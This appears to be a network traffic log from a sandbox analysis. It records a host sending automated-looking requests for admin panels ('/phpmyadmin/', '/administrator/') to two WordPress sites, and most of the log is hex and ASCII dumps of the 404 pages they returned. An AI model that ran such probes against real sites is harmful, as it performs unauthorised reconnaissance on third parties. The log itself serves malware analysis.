2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b Data Ascii: eft;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;
2023-12-22 20:14:58 UTC	566	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2c 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 6f 6e 73 61 6c 65 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e Data Ascii: p-block-button__link, .wc-block-grid__product-onsale{color:rgba(0,0,0,0.58);border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce .woocommerce-message a.button:hover,.woocommerce #respon
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 62 35 63 64 0d 0a 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 2c 20 2e 77 Data Ascii: b5cdlock-button__link:hover{color:#000000;border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button, .woocommerce button.button, .woocommerce .woocommerce-message a.button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .w
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 69 6e 67 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 5f 68 65 61 64 69 6e 67 7b 77 69 64 74 68 3a 34 30 25 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 63 6c 65 61 72 3a 72 69 67 68 74 3b 7d 7d 73 65 6c 65 63 74 2c 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: ing, .woocommerce-page.woocommerce-checkout form #order_review, .woocommerce-page.woocommerce-checkout form #order_review_heading{width:40%;float:right;margin-right:0;clear:right;}}select, .select2-container .select2-selection--single{background-image:url
2023-12-22 20:14:58 UTC	13786	IN	Data Raw: 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 22 3e 0a 09 3c 6c 61 62 65 6c 3e 0a 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 3e 43 65 72 63 61 3a 3c 2f 73 70 61 6e 3e 0a 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 69 65 6c 64 22 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 43 65 72 63 61 20 26 68 65 6c 6c 69 70 3b 22 20 76 61 6c 75 65 3d 22 22 20 6e 61 6d 65 3d 22 73 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 0a 09 09 09 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 Data Ascii: lass="search-form" action="https://saltdelcolom.com/"><label><span class="screen-reader-text">Cerca:</span><input type="search" class="search-field" placeholder="Cerca …" value="" name="s" tabindex="-1"></label><input type="submit"

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	60700	50.31.65.5	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:56 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:14:58 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:58 UTC	833	IN	Data Raw: 65 32 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 65 Data Ascii: e29c<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt de
2023-12-22 20:14:58 UTC	14994	IN	Data Raw: 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 32 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e Data Ascii: /images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/saltdelcolom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 35 37 31 34 32 38 35 37 31 34 32 38 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 7d 62 6f 64 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 Data Ascii: ,.elementor-button-wrapper .elementor-button:visited{color:rgba(0,0,0,0.58);}.elementor-button-wrapper .elementor-button{font-weight:600;font-size:12px;font-size:0.85714285714286rem;line-height:1em;letter-spacing:1px;}body .elementor-button.elementor-size
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f Data Ascii: global-color-0-color{color:var(--ast-global-color-0);}:root .wp-block-button .has-ast-global-color-0-background-color{background-color:var(--ast-global-color-0);}:root .has-ast-global-color-1-color{color:var(--ast-global-color-1);}:root .has-ast-global-co
2023-12-22 20:14:58 UTC	9425	IN	Data Raw: 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d Data Ascii: ft;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 64 33 33 31 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 70 61 67 6f 2d 72 65 64 73 79 73 2d 67 72 61 66 72 65 61 6b 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 70 61 67 6f 2d 72 65 64 73 79 73 2d 74 70 76 2d 67 72 61 66 72 65 61 6b 2f 70 75 62 6c 69 63 2f 63 73 73 2f 70 61 67 6f 2d 72 65 64 73 79 73 2d 67 72 61 66 72 65 61 6b 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 69 67 68 74 63 61 73 65 2e 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 Data Ascii: d331<link rel='stylesheet' id='pago-redsys-grafreak-css' href='https://saltdelcolom.com/wp-content/plugins/pago-redsys-tpv-grafreak/public/css/pago-redsys-grafreak-public.css?ver=1.0.0' media='all' /><link rel='stylesheet' id='lightcase.css-css' href='
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 62 75 74 74 6f 6e 7b 66 6c 65 78 3a 31 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 20 6c 69 20 61 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 20 6c 69 20 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 2e 77 6f 6f 63 6f 6d 6d Data Ascii: tions .coupon .button, .woocommerce-page #content table.cart td.actions .coupon .button{flex:1;}.woocommerce #content div.product .woocommerce-tabs ul.tabs li a, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs li a{display:block;}.woocomm
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 0d 0a 3c 61 0d 0a 09 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 0d 0a 09 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 0d 0a 09 72 6f 6c 65 3d 22 6c 69 6e 6b 22 0d 0a 09 74 69 74 6c 65 3d 22 56 c3 a9 73 20 61 6c 20 63 6f 6e 74 69 6e 67 75 74 22 3e 0d 0a 09 09 56 c3 a9 73 20 61 6c 20 63 6f 6e 74 69 6e 67 75 74 3c 2f 61 3e 0d 0a 0d 0a 3c 64 69 76 0d 0a 63 6c 61 73 73 3d 22 68 66 65 65 64 20 73 69 74 65 22 20 69 64 3d 22 70 61 67 65 22 3e 0d 0a 09 09 09 3c 68 65 61 64 65 72 0d 0a 09 09 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 61 73 74 2d 70 72 69 6d 61 72 79 2d 73 75 62 6d 65 6e 75 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 20 68 65 61 64 65 72 2d 6d 61 69 6e 2d 6c 61 79 6f 75 Data Ascii: <aclass="skip-link screen-reader-text"href="#content"role="link"title="Vs al contingut">Vs al contingut</a><divclass="hfeed site" id="page"><headerclass="site-header ast-primary-submenu-animation-fade header-main-layou
2023-12-22 20:14:58 UTC	4926	IN	Data Raw: 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6f 72 65 2d 62 6c 6f 63 6b 2d 73 75 70 70 6f 72 74 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 63 6f 6e 74 61 69 6e 65 72 2d 32 2e 77 70 2d 63 6f 6e 74 61 69 6e 65 72 2d 32 7b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 6a 73 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 76 61 72 20 61 73 74 72 61 20 3d 20 7b 22 62 72 65 61 6b 5f 70 6f 69 6e 74 22 3a 22 31 31 30 33 22 2c 22 69 73 52 74 6c 22 3a 22 22 2c 22 69 73 5f 73 63 72 6f 6c 6c 5f 74 6f 5f 69 64 22 3a 22 22 2c 22 69 73 5f 73 63 72 6f 6c 6c 5f 74 6f 5f 74 6f 70 22 3a 22 22 2c 22 69 73 5f 68 65 61 64 65 72 5f 66 6f 6f 74 65 72 Data Ascii: </style><style id='core-block-supports-inline-css'>.wp-container-2.wp-container-2{flex-wrap:nowrap;}</style><script id='astra-theme-js-js-extra'>var astra = {"break_point":"1103","isRtl":"","is_scroll_to_id":"","is_scroll_to_top":"","is_header_footer

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	60795	209.124.80.122	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	173	OUT	GET /administrator/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:57 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:58 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:14:58 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:14:58 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
